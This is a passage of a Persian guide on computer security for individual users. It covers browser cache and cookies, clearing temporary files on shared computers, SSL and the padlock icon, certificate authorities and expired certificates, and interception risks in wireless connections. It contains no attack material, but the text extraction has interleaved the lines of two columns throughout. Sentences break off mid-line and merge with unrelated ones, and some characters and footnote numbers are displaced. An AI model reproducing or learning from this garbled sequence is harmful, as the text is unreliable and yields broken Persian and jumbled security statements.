ﺍﻳﻦ ﻣﻮﺭﺩ ﺣﺘﻲ ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧـﺔ ﺧـﺼﻮﺻﻲ ﻛـﻪ ﭼﻨـﺪ ﻧﻔـﺮ ﺍﺯ ﺁﻥ ﻛﻪ ﺷﻤﺎ ﺍﺯ ﻛﺪﺍﻡ ﭘﺎﻳﮕﺎﻫﻬﺎ ﺩﻳﺪﻥ ﻛﺮﺩﻩ ﺑﻮﺩﻳﺪ .ﺍﺯ ﺍﻳﻦ ﭘـﺲ Zﺩﺭ ﻣـﻮﺭﺩ
ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻣﻮﺭﺩ ﻋﻼﻗﺔ ﺷﻤﺎ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺑﻲ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺸﻜﻞﺳﺎﺯ ﺷـﻮﺩ .ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ
ﺩﺍﺭﺩ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺗﺒﻠﻴﻐﺎﺕ ﺑﻪ ﺷﻤﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﺪ.
٨٧ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻣﺮﻭﺭﮔﺮﻱ ﺩﺭ ﻧﻮﺍﺭ ﺍﺑﺰﺍﺭ ﺧﻮﺩ ﻧﻤﺎﻳﻪﺍﻱ ﻗﺮﺍﺭ ﻧﺪﺍﺩﻩ ﻛﻪ ﺑﺎ ﻛﻠﻴﻚ ﺑﺮ cookieﻫﺎ ﻧﻪ ﺗﻨﻬﺎ ﻳﻚ ﻣﺸﻜﻞ ﺑﺮﺍﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ،
ﺭﻭﻱ ﺁﻥ ﺑﺘﻮﺍﻥ ﺑﻪ ﺁﺳﺎﻧﻲ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ ﺭﺍ ﭘﺎﻙ ﻧﻤﻮﺩ. ﺑﻠﻜﻪ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ .ﺍﮔﺮ ﺑﺨﺸﻲ ﺍﺯ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﻪ ﺷـﻜﻞ ﺑـﻲﺳـﻴﻢ ﻣﺠﻤﻮﻋﺔ ﺻﻔﺤﺎﺕ ﻭ ﺗﺼﺎﻭﻳﺮ ﺫﺧﻴﺮﻩﺷﺪﻩ "ﺣﺎﻓﻈﺔ ﻧﻬـﺎﻥ" ﻧﺎﻣﻴـﺪﻩ
ﺑﺎﺷﺪ ﻭ ﻳﺎ ISPﺍﻧﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻁ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﺒﺎﺷﺪ ﺩﺯﺩﻱ ﭘﻴـﺎﻡ ﻣﻲﺷﻮﻧﺪ .ﺍﮔﺮ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ ﻭ ﺻﻔﺤﺔ
ﺍﺯ ﻣﻴﺎﻥ ﺭﺍﻩ ﺭﺍﺣﺖﺗﺮ ﻣﻲﺷﻮﺩ ﻭ ﻟﺬﺍ ﺗﻮﺟﻪ ﺑـﻪ ﺁﻥ ﺍﻫﻤﻴـﺖ ﺑـﺴﻴﺎﺭ ﺁﻥ ﺗﻐﻴﻴﺮ ﻧﻜﺮﺩﻩ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻭﺭﮔـﺮ ﻛـﻞ ﺻـﻔﺤﻪ ﺭﺍ ﺍﺯ
ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ. ﺍﺑﺘﺪﺍ downloadﻧﻜﻨﺪ ،ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﺁﻥ ﺍﺯ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ
ﻣﺮﻭﺭﮔﺮﻫﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺣﻞ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺍﺯ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ .ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺻـﻔﺤﺎﺕ ﻭﺑـﻲ ﻛـﻪ ﺩﺭ ﺣﺎﻓﻈـﺔ
ﻧﻬﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ) offlineﻳﻌﻨﻲ ﺑﺪﻭﻥ ﺍﺗـﺼﺎﻝ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻬﺮﻩ ﻣﻲﺑﺮﻧﺪ .ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘﻴـﺎﻡ ﺭﺍ ﺗﻐﻴﻴـﺮ ﻣـﻲﺩﻫـﺪ؛
ﺍﻳﻨﺘﺮﻧﺘﻲ( ﻧﻴﺰ ﺩﻳﺪﻩ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻫﺮﺁﻧﭽﻪ ﺗﻮﺳـﻂ
ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﻭ ﺣﺘـﻲ ﻏﻴـﺮﻣﻤﻜﻦ
ﻣﺮﻭﺭﮔﺮ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﺩﺭ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺷـﺪﻩ
ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺨﻮﺍﻧﻨﺪ )ﺑﺮﺍﻱ ﺟﺰﺋﻴـﺎﺕ
ﺍﺳﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﻣـﺎﻟﻲ ﺍﺯ ﻭﺏ ﺍﺳـﺘﻔﺎﺩﻩ
ﺑﻴــﺸﺘﺮ ﺿــﻤﻴﻤﺔ ۱ﻫﻤــﻴﻦ ﺑﺨــﺶ ﺭﺍ ﻣﻄﺎﻟﻌــﻪ ﻧﻤﺎﻳﻴــﺪ( .ﻧــﺎﻡ ﭘﺮﻭﺗﻜــﻞ
ﻣﻲﻛﻨﻴﺪ ،ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪ ،ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ
ﺭﻣﺰﮔﺬﺍﺭﻱ " ٨٩"SSLﺍﺳـﺖ .ﻣـﻲ ﺗﻮﺍﻧﻴـﺪ ﺑـﺮﺍﻱ ﭘﻴﺎﻣﻬـﺎﻳﻲ ﻛـﻪ
ﻼ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻭ ﺑﺎﺯﻳـﺎﺑﻲ ﺧﻮﺍﻫﻨـﺪ ﺷـﺪ. ﺷﻤﺎ ﺩﺭ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻣ ﹰ
ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﺍﺯ SSLﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ .ﺩﺭ ﺍﻛﺜـﺮ ﻣﺮﻭﺭﮔﺮﻫـﺎ
ﺑﺎﺗﻮﺟﻪ ﺑﻪ ﻣﻴﺰﺍﻥ ﻣﺮﻭﺭ ﻭ ﺍﻧﺪﺍﺯﺓ ﺣﺎﻓﻈﺔ ﻧﻬـﺎﻥ ،ﺍﻳـﻦ ﺻـﻔﺤﺎﺕ ﻭ
ﺗﺼﻮﻳﺮ ﻛﻮﭼﻜﻲ ﺍﺯ ﻳﻚ ﻗﻔﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﻋـﺎﺩﻱ
ﭘﻴﺎﻡ ﺑﺎﺯ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻻﺗﻲ ﺍﺯ ﻧﻮﻉ SSLﺑﻪ ﺣﺎﻟﺖ ﺑﺴﺘﻪ ﺩﺭ ﺗﺼﺎﻭﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺎ ﻣﺪﺗﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ.
ﻣــﻲﺁﻳــﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟــﺖ URLﺁﻥ ﺻــﻔﺤﻪ ﺑﺠــﺎﻱ " "httpﺑــﺎ
ﻗﺎﻧﻮﻥ ﭼﻬﺎﺭﺩﻫﻢ:
" "httpsﺁﻏﺎﺯ ﻣﻲﺷـﻮﺩ .ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺩﺭ ﻛـﺸﻮﺭﺗﺎﻥ ﺍﻣﻜـﺎﻥ ﺁﻥ
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﺷﻤﺎ ﺩﺭ ﺻﻔﺤﺔ ﻭﺏ
ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ،ﺑﻬﺘـﺮ ﺍﺳـﺖ ﻫﻤـﻮﺍﺭﻩ ﺍﺯ ﻗـﻮﻱﺗـﺮﻳﻦ ﺭﻭﺵ
ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﺷﺪ ،ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﻛـﺎﺭ ﺑﺎﻳـﺪ ﺣﺎﻓﻈـﺔ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
ﻧﻬﺎﻥ ﺭﺍ ﭘﺎﻙ ﻧﻤﺎﻳﻴﺪ .ﺍﮔﺮ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠـﺎﻡ
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻳﻦ ﻗﻔﻞ ﻣﺸﺨﺺ ﻧﻤﻲﻛﻨﺪ ﭘﻴﺎﻣﻲ ﻛﻪ ﺍﺯ ﺩﻫﻴﺪ )ﻣﺜ ﹰﻼ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ(
ﻃﺮﻑ ﺷﻤﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ
ﻧﺒﺎﻳﺪ ﺍﺯ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﺔ
ﺍﺯ SSLﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ ﻳﺎ ﻧﻪ ،ﺍﻣﺎ ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ
ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
ﺍﮔﺮ ﺻﻔﺤﺔ ﺍﺭﺳﺎﻟﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷﺪ ،ﭘﻴـﺎﻡ ﺑﺎﺯﮔـﺸﺘﻲ ﻧﻴـﺰ
ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﺩ. ﻛﻠﻴﺔ ﻣﺮﻭﺭﮔﺮﻫﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ )ﻛﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﻣـﻮﻗﺘﻲ
ﺍﻳﻨﺘﺮﻧـﺖ ٨٨ﻧﺎﻣﻴـﺪﻩ ﻣـﻲﺷـﻮﺩ( ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ﭘـﺎﻙ ﻛﻨﻴـﺪ؛ ﺍﻣـﺎ
SSLﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﺮﻭﺭﮔـﺮ ﺑﺪﺍﻧـﺪ ﻣﺨﺎﻃـﺐ ﺁﻥ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤﻮﻣﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﻛﻴــﺴﺖ .ﺍﻳــﻦ ﺍﻣــﺮ ﺑــﻪ ﻛﻤــﻚ ﮔــﻮﺍﻫﻲ ﺍﻣﻨﻴﺘــﻲ ٩٠ﻭ ﺍﻣــﻀﺎﻱ
ﻣﻲﮔﻴﺮﻧﺪ ﺍﺟﺎﺯﺓ ﻛﻨﺘﺮﻝ ﻭ ﺣـﺬﻑ ﺣﺎﻓﻈـﺔ ﻧﻬـﺎﻥ ﺭﺍ ﻧﻤـﻲﺩﻫﻨـﺪ.
ﺩﻳﺠﻴﺘﺎﻟﻲ ٩١ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ .ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﮔـﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
ﺍﮔﺮﭼﻪ ﭘﺎﻙ ﻛﺮﺩﻥ ﺍﻳﻦ ﺣﺎﻓﻈﻪ ﭘﺲ ﺍﺯ ﻭﺭﻭﺩ ﺍﻃﻼﻋﺎﺕ ﺣـﺴﺎﺱ
ﻭﺏ ﺑﺨﻮﺍﻫﺪ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺍﺯ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ ﺻﺪﻭﺭ
ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ،ﺍﻣﺎ ﺗـﺎ ﺑـﻪ ﺣـﺎﻝ ﻫـﻴﭻ
ﮔﻮﺍﻫﻲ ،ﮔﻮﺍﻫﻲ ﺍﻣﻨﻴﺘﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳـﺪ .ﺍﮔـﺮ ﺍﻳـﻦ ﻣﺮﻛـﺰ ﺑﺨﻮﺍﻫـﺪ
ﺍﻧﺠﺎﻡ ﺩﺍﺩ ،ﻭ ﻧﻴﺰ ﺍﻳﻨﻜﻪ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﺍﺯ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺣﻔﺎﻇﺖ ﻛـﺮﺩ. ﺑﺪﺭﺳﺘﻲ ﺑﻪ ﻭﻇﻴﻔﺔ ﺧﻮﺩ ﻋﻤﻞ ﻧﻤﺎﻳﺪ ﺑﺎﻳﺪ ﺑﺮﺭﺳﻲ ﻛﻨﺪ ﻓﺮﺩﻱ ﻛـﻪ
ﻛﻠﻴﺔ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺩﻱ ﻳﺎ ﻣـﺎﻟﻲ ﺟﻤـﻊﺁﻭﺭﻱ ﺩﺭﺧﻮﺍﺳﺖ ﮔﻮﺍﻫﻲ ﻧﻤﻮﺩﻩ ﻫﻤﺎﻥ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﺧﻮﺩﺵ ﺍﺩﻋـﺎﻱ
ﻣﻲﻛﻨﻨـﺪ ﺑﺎﻳـﺪ ﺍﺯ ﻳـﻚ ﺳﻴﺎﺳـﺖ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻣﻨﺎﺳـﺐ ﻭ ﺁﻧﺮﺍ ﺩﺍﺭﺩ .ﺳﭙﺲ ﺍﻳﻦ ﻣﺮﻛﺰ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﺍﻣـﻀﺎ
ﺍﻋﻼﻡﺷﺪﻩ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ. ﻣﻲﻛﻨﺪ ﻭ ﻣﺮﻭﺭﮔﺮ ﺷﻤﺎ ﺟﺪﺍﻭﻟﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ
ﺫﺧﻴﺮﻩ ﻣﻲﻧﻤﺎﻳﺪ.
ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳﻴﻢ
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺯ ﺳﻮﻱ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﭘﻴﺎﻣﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴـﺪ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻭ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﮔﻮﺍﻫﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺁﻥ ﻣﻨﻘﻀﻲ ٩٢ﺷﺪﻩ ﻳـﺎ ﻣﺘﻌﻠـﻖ
ﻻ
ﺗﻮﺳــﻌﻪﻳﺎﻓﺘــﻪ ﺭﻭ ﺑــﻪ ﺍﻓــﺰﺍﻳﺶ ﺍﺳــﺖ .ﺍﻳــﻦ ﻓﻨــﺎﻭﺭﻱ ﻣﻌﻤــﻮ ﹰ ﺑﻪ ﻣﻜﺎﻥ ﺩﻳﮕﺮﻱ ﺍﺳﺖ .ﺣﺎﻟﺖ ﺍﻭﻝ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺗﺎﺭﻳﺦ ﺍﻋﺘﺒﺎﺭ
ﻛﻢﻫﺰﻳﻨﻪﺗﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺳـﻴﻤﻲ ﺍﺳـﺖ ،ﺩﺭ ﺍﻣـﺎﻛﻦ ﺧـﺼﻮﺻﻲ ﮔﻮﺍﻫﻲ ﺑﺘﺎﺯﮔﻲ ﺑﻪ ﭘﺎﻳﺎﻥ ﺭﺳﻴﺪﻩ ﻭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑـﺮﺍﻱ ﺗﻤﺪﻳـﺪ ﺁﻥ
ﺭﺍﺣﺖﺗﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﻧﺼﺐ ﻣﻲﺷﻮﺩ ﻭ ﺍﺷﻜﺎﻻﺕ ﺗﻨﻈﻴﻤﻲ ﻛﻤﺘـﺮﻱ ﺑﺎﻳﺪ ﺗﺸﺮﻳﻔﺎﺕ ﺍﺩﺍﺭﻱ ﺗﻤﺪﻳﺪ ﮔﻮﺍﻫﻲ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﺪ .ﺩﺭ ﺣﺎﻟﺖ ﺩﻭﻡ
ﺩﺍﺭﺩ .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﺩﺍﺭﺍﻱ ﺩﻭ ﻣـﺸﻜﻞ ﺑـﺎﻟﻘﻮﻩ ﻻ ﭘﺎﻳﮕﺎﻩ ﻣﻮﺭﺩ ﻧﻈـﺮ ﺗﻐﻴﻴـﺮ ﻧـﺎﻡ ﺩﺍﺩﻩ ﻭ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺩﺭ
ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ
ﺍﺳﺖ: ﮔﻮﺍﻫﻲ ﺁﻥ ﻣﻨﻌﻜﺲ ﻧﺸﺪﻩ ﺍﺳﺖ .ﺑـﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺍﮔـﺮ ﺧﻮﺍﺳـﺘﺎﺭ
ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻴﺎﻧﺔ ﺍﻧﺘﻘﺎﻝ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ. •
ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﺍﻳﻤﻨﻲ ﻫﺴﺘﻴﺪ ﺩﺭ ﻫﺮ ﺩﻭ ﺣﺎﻟﺖ ﺑﺎﻳﺪ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ
ﻣﺸﻜﻞ ﺑﮕﻮﻧﻪﺍﻱ ﺭﻓﻊ ﺷﻮﺩ ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﺧﻮﺩ ﺑﺎ ﺁﻥ ﭘﺎﻳﮕـﺎﻩ ﺧﺎﺗﻤـﻪ
ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﻜﺎﻥ ،ﺁﺏ ﻭ ﻫﻮﺍ ،ﺯﻣﺎﻥ ﺭﻭﺯ ،ﻧﺰﺩﻳـﻚ ﺑـﻮﺩﻥ •
ﺩﻫﻴﺪ.
ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﺩﻳﻮﻳﻲ ،ﺳﺮﻋﺖ ﺍﻧﺘﻘﺎﻝ ﺧﻂ ،ﻛﻴﻔﻴﺖ ﻧﺼﺐ ﻭ
ﺗﺪﺍﺧﻠﻬﺎﻱ ﻣﺨﺮﺏ ،ﺳﺮﻋﺖ ﻭ ﻛﻴﻔﻴﺖ ﺍﻧﺘﻘﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻳﺎ ﺍﻧﺘﻘﺎﻝ ﺍﻣﻦ ﻛﺎﻓﻲ ﺍﺳﺖ؟
ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ.
ﻳﻚ ﻗﻔﻞ ﻛﻮﭼﻚ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﺍﻣـﻦ ﺩﺭ ﻭﺏ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﻭ
ﺩﺭ ﻣﻮﺭﺩ ﺩﺳﺘﺔ ﺩﻭﻡ ﻣﺸﻜﻼﺕ ،ﻛﺎﺭ ﺯﻳﺎﺩﻱ ﻧﻤﻲﺗﻮﺍﻥ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ. ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﺍﻧﺘﻘﺎﻝ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ .ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ ﺍﻧﺘﻘـﺎﻝ ﺗﻨﻬـﺎ
ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻭ ﺍﺯ ﻫﺰﻳﻨـﻪﻫـﺎﻳﻲ ﻣﻮﺭﺩﻱ ﻧﻴﺴﺖ ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ
ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑـﻲﺳـﻴﻢ ﺑﺎﻳـﺪ ﭘﺮﺩﺍﺧـﺖ ﮔﻴﺮﺩ .ﺗﻨﻬﺎ ﺩﺭﺻﺪ ﻛﻤﻲ ﺍﺯ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎ ﻳﺎ ﺳﺮﻗﺘﻬﺎﻱ ﻫﻮﻳﺖ ﺩﺭ
ﺷﻮﻧﺪ .ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺩﺯﺩﻱ ﻣﻴﺎﻥ ﺭﺍﻩ ٩٤ﻧﻴﺰ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ ﺍﺛﺮ ﺍﻧﺘﻘﺎﻝ ﻧﺎﺍﻣﻦ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ .ﺩﺭﺻﺪ ﻋﻤﺪﺓ ﻣﺴﺎﺋﻞ ﻣـﻮﺍﺭﺩﻱ
ﻣﺨﺘﻠﻒ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺖ )ﺑـﺮﺍﻱ ﺟﺰﺋﻴـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻣـﻮﺭﺩ ﺭﻭﺷـﻬﺎﻱ ﻫﺴﺘﻨﺪ ﭼﻮﻥ:
ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺿـــﻤﻴﻤﺔ ۱ﺍﺯ ﻫﻤــﻴﻦ ﺑﺨـــﺶ ﺭﺍ ﻣﻄﺎﻟﻌــﻪ ﻛﻨﻴـــﺪ( .ﺍﮔـــﺮ
ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﺍﻱ ﺩﺍﺭﻳﺪ ﻛﻪ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻓﻘﺪﺍﻥ ﺍﺻﻮﻝ ﺍﺧﻼﻗﻲ ﺩﺭ ﺑﻌﻀﻲ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ؛ •
ﻣﻲﻛﻨﺪ ﺣﺘﻤﹰﺎ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ )ﻣﺜﻞ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺷﺨﺼﻲ؛ •
